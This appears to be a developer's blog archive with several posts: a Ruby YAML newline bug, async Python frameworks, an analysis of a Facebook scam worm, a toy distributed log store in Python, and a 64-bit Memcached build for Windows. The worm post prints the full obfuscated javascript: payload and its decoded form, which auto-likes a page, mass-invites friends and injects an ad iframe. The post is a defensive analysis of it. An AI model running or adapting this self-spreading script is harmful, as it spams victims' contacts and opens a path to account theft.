Bug in Ruby YAML

Recently I stumbled on a really weird bug in Ruby's YAML implementation (the syck parser, which is the default for Ruby < 1.9.3).

The problem is that the parser converts \r\n (the Windows newline) into \n (the Unix newline). You can see the error by running this code:
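A minimal reproduction might look like this (a sketch; syck was the default YAML parser before 1.9.3):

```ruby
require 'yaml'

s = "test\r\n"
# round-trip the string through YAML: dump it, then load it back
result = YAML.load(YAML.dump(s))
# with syck (Ruby < 1.9.3) result is "test\n" -- the \r is silently lost;
# with psych the string round-trips intact as "test\r\n"
p result
```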


Running this returns "test\n" when it should return "test\r\n" (serializing and deserializing are supposed to be exact inverses of each other).

This is fixed in Ruby 1.9.3, which uses the psych parser by default.

Async networking in python

I gave a talk at the PyWEBIL meeting yesterday about async networking in Python.

The talk was a quick overview of the async frameworks available in Python (and also node.js), with an example comet chat room in each framework.

Slides can be found here and code examples here.

NOTE: the code examples are meant to be simple and are probably not the correct way to implement comet in each framework.

Facebook worm ahead

A few days ago I got a Facebook notification about a friend of mine suggesting that I "like" some group.

It was a group that finds your celebrity twin (in terms of appearance). I have heard about technologies that can do that, so I went to see what the group was about, even though I know most groups like this are scams.

This group was no exception. It asked you to click "like" in order to show its info page; after that it asked you to click a link, and after clicking that link a modal window appeared.

It first asks which browser you are using (WTF?), then walks you through a series of keyboard combinations (Ctrl-C, Alt-D, Ctrl-V in Firefox) that ends up pasting a nasty piece of JavaScript into your URL bar, and then it asks you to press Enter :)

Of course I didn't. Instead, I took that code and started to analyze it:

javascript:(function(){a='app134292463250339_jop';b='app134292463250339_jode';ifc='app134292463250339_ifc';ifo='app134292463250339_ifo';mw='app134292463250339_mwrapper';eval(function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];d=U;d[e[2]](V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]](e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]](c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||'.split('|'),0,{}))})();

Having done my fair share of JavaScript coding, I quickly identified it as packed by Dean Edwards' Packer (the function(p,a,c,k,e,r) signature is an easy way to spot it).

So the next step was to unpack it, which I did by running the inner function in Firebug. What I got was this:

var _0x95ea=["\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79","\x73\x74\x79\x6C\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x68\x69\x64\x64\x65\x6E","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x76\x61\x6C\x75\x65","\x73\x75\x67\x67\x65\x73\x74","\x6C\x69\x6B\x65\x6D\x65","\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73","\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74","\x63\x6C\x69\x63\x6B","\x69\x6E\x69\x74\x45\x76\x65\x6E\x74","\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67"];d=document;d[_0x95ea[2]](mw)[_0x95ea[1]][_0x95ea[0]]=_0x95ea[3];d[_0x95ea[2]](a)[_0x95ea[4]]=d[_0x95ea[2]](b)[_0x95ea[5]];s=d[_0x95ea[2]](_0x95ea[6]);m=d[_0x95ea[2]](_0x95ea[7]);c=d[_0x95ea[9]](_0x95ea[8]);c[_0x95ea[11]](_0x95ea[10],true,true);s[_0x95ea[12]](c);setTimeout(function(){fs[_0x95ea[13]]()},5000);setTimeout(function(){SocialGraphManager[_0x95ea[16]](_0x95ea[14],_0x95ea[15])},5000);setTimeout(function(){m[_0x95ea[12]](c);d[_0x95ea[2]](ifo)[_0x95ea[4]]=d[_0x95ea[2]](ifc)[_0x95ea[5]]},5000);

So it seems there is another layer of obfuscation. The most interesting part is the _0x95ea array, which is hex encoded, so I just copy-pasted it into a Python shell, and the result was:

['visibility', 'style', 'getElementById', 'hidden', 'innerHTML', 'value', 'suggest', 'likeme', 'MouseEvents', 'createEvent', 'click', 'initEvent', 'dispatchEvent', 'select_all', 'sgm_invite_form', '/ajax/social_graph/invite_dialog.php', 'submitDialog']
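The decoding is trivial because Python (like JavaScript) interprets \xNN escapes in string literals as it parses them; pasting even a couple of the entries shows what is going on:

```python
# the \xNN escapes are plain ASCII codes, so the literals
# already ARE the decoded strings once parsed
encoded = ["\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79",
           "\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64"]
print(encoded)  # ['visibility', 'getElementById']
```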

OK, so that seems to be a list of JavaScript properties/methods and some other constants. The rest of the code is just referencing this array, so let's replace the references with the actual values:

d=document;
d.getElementById(mw).style.visibility='hidden';
d.getElementById(a).innerHTML=d.getElementById(b).value;
s=d.getElementById('suggest');
m=d.getElementById('likeme');
c=d.createEvent('MouseEvents');
c.initEvent('click',true,true);
s.dispatchEvent(c);
setTimeout(function(){fs.select_all()},5000);
setTimeout(function(){SocialGraphManager.submitDialog('sgm_invite_form','/ajax/social_graph/invite_dialog.php')},5000);
setTimeout(function(){m.dispatchEvent(c);d.getElementById(ifo).innerHTML=d.getElementById(ifc).value},5000);

At first look I thought it was only opening the invite window, hiding it, and sending an invitation to your friends (that is how I got the invitation, and that is the worm-like behavior).

But that was because I overlooked this line:

d.getElementById(ifo).innerHTML = d.getElementById(ifc).value;

This line injects this HTML fragment into the page:

<iframe width="700" height="550" frameborder="0" scrolling="yes" src="http://xa.ly/Vx"></iframe>

The src is a link through some kind of link shortener that pays you for each impression and also redirects you to a page full of ads, so the creator of this page makes some $$ for each sucker who clicks "like"!

The group currently has around 17,000 users; at 10 cents per impression (an assumption), that is a nice ~$1,700 out of thin air!

So that's it: it spreads like a worm (although a somewhat manual one) and makes the author some money.

The thing is, this technique can be used for truly evil stuff, like stealing your Facebook account (for example, by sending your cookies to a remote server). Most tech-savvy people will not fall for this kind of crap, but 17,000 users already did.

PS: the link to the group is http://www.facebook.com/pages/hds-mzw-t-htwm-slkm-bpyysbwq-wbd/128140680541003. It is in Hebrew, so the target audience is small; I wonder how many people an English group could attract :)

PS2: I reported this group, but that doesn't seem to have shut it down. I hope this post will make Facebook shut down these kinds of groups.

Writing a distributed datastore in Python

I am writing a distributed datastore in Python for a very specific kind of data, and I wanted to show how you can build a simple distributed system in Python.
For this post we will build a distributed log: a system that lets you store logs from many servers in one big log that is distributed across many machines.
We start with an overview of the components of the system:

diagram of components

The system has two major components: the master node and the storage nodes.
Storage nodes are simple, dumb nodes that store and retrieve data when asked.

The master node is responsible for accepting writes from servers and forwarding those writes to the storage nodes in a way that distributes the data across all the nodes.
When a server sends its log entries to the master, the following happens:

  1. the master gets the K log entries and selects N (the replication factor) nodes that will store them
  2. the master sends a copy of the K entries to each of the N nodes and waits for them to write the entries to their local store (be it memory or disk)
  3. the master then records in its local data structure that those N nodes hold those K entries.

The master also handles client requests. When a client wants to read a portion of the log, the following happens:

  1. the client sends the master a request with the time range it wants to read.
  2. the master decides which nodes hold that information and asks each of those nodes for its entries.
  3. the master combines the results and sends them back to the client.
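The write and read paths above can be sketched without any networking. This toy version (hypothetical names; plain dicts stand in for the storage nodes) shows how entries fan out to N nodes on write and fan back in on a range read:

```python
from random import sample

REPLICATION_FACTOR = 2  # N: how many copies of every entry we keep
nodes = {9001: {}, 9002: {}, 9003: {}}  # port -> {dt: data}, stand-ins for storage nodes
dt_to_nodes = {}  # the master's index: which nodes hold each timestamp

def add_entries(data, dt):
    # write path: pick N nodes, copy the entries to each, record the placement
    chosen = sample(list(nodes), REPLICATION_FACTOR)
    for port in chosen:
        nodes[port][dt] = data
    dt_to_nodes[dt] = chosen

def get_range(start_dt, end_dt):
    # read path: fetch each timestamp back from one of the nodes that hold it
    return {dt: nodes[ports[0]][dt]
            for dt, ports in dt_to_nodes.items()
            if start_dt <= dt <= end_dt}

add_entries(["line 1", "line 2"], 100)
add_entries(["line 3"], 200)
print(get_range(100, 150))  # {100: ['line 1', 'line 2']}
```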

This design (single master, multiple slaves) has pros and cons.

Pros:

  • simple design: the master coordinates both reads and writes.
  • complex operations, like garbage collection, can be implemented in the master.
  • the master has a consistent view of the cluster and can make elaborate decisions about data placement.

Cons:
  • SPOF (single point of failure): if the master is down, all logs are inaccessible. This can be solved with a shadow master (as in the Google File System) or with a multi-master/no-master design (out of the scope of this post).
  • the cluster size is limited by the master's capacity; for example, the master's RAM (or disk) limits how many log entries it can track node placement for.
  • read/write throughput is limited by the master, as all writes and reads must go through it first.

Each component is basically a simple JSON-RPC server built with wsgi-jsonrpc.

Let's start by looking at the storage node code (storage_node.py):

from optparse import OptionParser
from wsgiref import simple_server
from wsgi_jsonrpc import json_tools, WSGIJSONRPCApplication

class StorageNode(object):
    def __init__(self):
        self.entries = []
        self.dt_to_entries = {}

    def add_entries(self, data, dt):
        # append the entries and index their position by timestamp
        self.entries.append(data)
        self.dt_to_entries[dt] = len(self.entries) - 1

    def get_entries(self, dts):
        return [(self.entries[self.dt_to_entries[dt]], dt) for dt in dts]

if __name__ == "__main__":
    parser = OptionParser()
    parser.add_option("-m", "--master-port", dest="master_port",
                      help="master port", type="int")
    parser.add_option("-p", "--port", dest="port",
                      help="storage port", type="int")
    (options, args) = parser.parse_args()
    node = StorageNode()
    try:
        print "joining master..."
        master = json_tools.ServerProxy(
            "http://localhost:%d" % options.master_port)
        master.join(options.port)
        print "joining completed, serving..."
        server = simple_server.make_server(
            'localhost', options.port,
            WSGIJSONRPCApplication(instance=node))
        server.serve_forever()
    except Exception, e:
        print "not working", e

The storage node accepts two arguments: the master port and its own port. On startup it sends a join request with its port to the master, so the master can communicate with it.
The storage node has two methods: add_entries, which writes new log entries to the local store (in this case a list), and get_entries, which retrieves entries by their timestamps (the dts parameter).

Now for the master node code:

from optparse import OptionParser
from random import sample
from collections import defaultdict
from wsgiref import simple_server
from wsgi_jsonrpc import json_tools, WSGIJSONRPCApplication

def get_proxy(port):
    return json_tools.ServerProxy("http://localhost:%d" % port)

class MasterNode(object):
    def __init__(self, options):
        self.options = options
        self.servers = set()
        self.dt_to_servers = {}
        self.dts = []

    def join(self, port):
        # called by a storage node on startup so we know how to reach it
        self.servers.add(port)

    def add_entries(self, data, dt):
        # copy the entries to N random storage nodes and remember who has them
        servers = sample(list(self.servers), self.options.replication_factor)
        for server in servers:
            get_proxy(server).add_entries(data, dt)
        self.dts.append(dt)
        self.dt_to_servers[dt] = servers

    def get_range(self, start_dt, end_dt):
        #should use binary search!
        servers_dts = defaultdict(list)
        for dt in self.dts:
            if dt >= start_dt and dt <= end_dt:
                # ask the first node that holds this timestamp
                servers_dts[self.dt_to_servers[dt][0]].append(dt)

        dts_data = {}
        for server, dts in servers_dts.iteritems():
            response = get_proxy(server).get_entries(dts)
            for data, dt in response['result']:
                dts_data[dt] = data
        return dts_data

if __name__ == "__main__":
    parser = OptionParser()
    parser.add_option("-p", "--port", dest="port", help="port", type="int")
    parser.add_option("-r", "--replication-factor",
                      dest="replication_factor",
                      help="the replication factor for entries", type="int")
    (options, args) = parser.parse_args()
    print "running..."
    server = simple_server.make_server(
        'localhost', options.port,
        WSGIJSONRPCApplication(instance=MasterNode(options)))
    server.serve_forever()

The master has a join method, which storage nodes call when joining the cluster; the master registers their ports in the servers set.
The other two methods are:

  • get_range - returns all the entries between start_dt and end_dt
  • add_entries - adds the entries that happened at dt (a timestamp) to the distributed store.

Both work in a distributed manner: an added entry gets copied to N (the replication factor) different storage nodes, and entries for a datetime range are fetched from the nodes that hold the data.

This implementation has some limitations:

  • it assumes all nodes run on the same machine on different ports (on purpose, since this is a demonstration); this is easily fixed by storing full addresses instead of ports.
  • it doesn't detect dead nodes and will keep sending requests to them; this can be fixed by adding a heartbeat system that checks each node's state.
  • new nodes that join the cluster start receiving writes immediately, but they should first copy data from other nodes to balance the load across the cluster (this is called bootstrapping).
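The heartbeat idea from the second limitation can be sketched very simply: periodically probe every node and drop the ones that do not answer. Here is_alive is a hypothetical callable that would wrap a ping RPC with a short timeout:

```python
def prune_dead_nodes(servers, is_alive):
    # keep only the nodes that answered the heartbeat probe;
    # is_alive(port) is a hypothetical ping-RPC wrapper
    return set(port for port in servers if is_alive(port))

# pretend node 9002 stopped answering
servers = {9001, 9002, 9003}
servers = prune_dead_nodes(servers, lambda port: port != 9002)
print(sorted(servers))  # [9001, 9003]
```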

All in all, I think this is a good start for anyone looking to build a distributed store.

Memcached 64-bit for Windows

UPDATE: this build is neither maintained nor official; you should use the Couchbase or other builds.

UPDATED BUILD:  http://blog.elijaa.org/index.php?post/2010/10/15/Memcached-for-Windows&similar

After spending a day searching for a 64-bit Windows build of Memcached, I finally gave up and compiled it myself.

I managed to build it from Memcached 1.4.2, with the Windows service code from http://jehiah.cz/projects/memcached-win32/.

The build platform is mingw64 (google it), with regular MinGW for the configure step (as mingw64 gets recognized as Cygwin).

This is a true 64-bit build: running stats shows that pointer_size is 64, and the memcached process can grow beyond 4GB.

You can download the binaries from here and the source from here.

Mirror: http://dl.dropbox.com/u/103946/memcached-win64.zip